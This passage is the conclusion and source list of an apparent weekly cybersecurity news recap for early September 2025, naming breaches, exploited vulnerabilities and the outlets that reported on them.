In summary, the first week of September 2025 underscored that cybersecurity is a continuous, collective effort. From major breaches and active exploits to high-level responses and new technologies, the landscape is dynamic. Organizations and defenders should digest the lessons from these events – bolster identity security (passwords/tokens), tighten software supply chain controls, patch critical systems, educate users, and collaborate across the community. The threats may never slow down, but with vigilance, agility, and shared knowledge, we can stay one step ahead.
Sources
KrebsOnSecurity – In-depth investigative blog by Brian Krebs (coverage of Salesloft-Drift breach, npm package compromise, etc.).
The Record (Recorded Future News) – Cybersecurity news site (reporting on Sitecore zero-day, Qantas breach fallout, scam network sanctions, etc.).
Distributed Denial of Secrets (DDoSecrets) – Non-profit leak archive (for context on data leaks, though no major new leaks were referenced this week).
Dark Reading – Cybersecurity news and analysis (e.g., coverage of SAP S/4HANA vulnerability exploitation and other enterprise security news).
Cybersecurity Dive – Industry news outlet (highlighted research on the Sitecore vulnerability and other breaking cyber stories).
SecurityWeek – Security news site (detailed reports on vulnerabilities like CVE-2025-42957 in SAP and other threats).
The Hacker News – Popular cybersecurity news platform (weekly threat recap, Google/Shein fines story, etc. by Ravie Lakshmanan).
BleepingComputer – Security news and tech help forum (multiple breach reports – Plex, Wealthsimple, Lovesac – and alerts on attacks like GhostAction, npm hijacks, iCloud phishing).
CyberScoop – Cyber policy and national security-focused outlet (covered government actions such as CISA alerts and international cyber developments).
Cybernews – Online cybersecurity news site (provided additional context on the week’s malware and breach revelations).
BankInfoSecurity – InfoSecurity Media Group site (news on financial sector breaches and regulatory actions relevant to incidents like the PowerSchool case).
CrowdStrike (Threat Intelligence) – Reports and blog posts from CrowdStrike’s intel team (for APT28 NotDoor backdoor analysis and trends in adversary tactics).
Cybersecurity Ventures – Cyber economics research (tracked cybersecurity investments and published statistics like the increase in password cracking rates).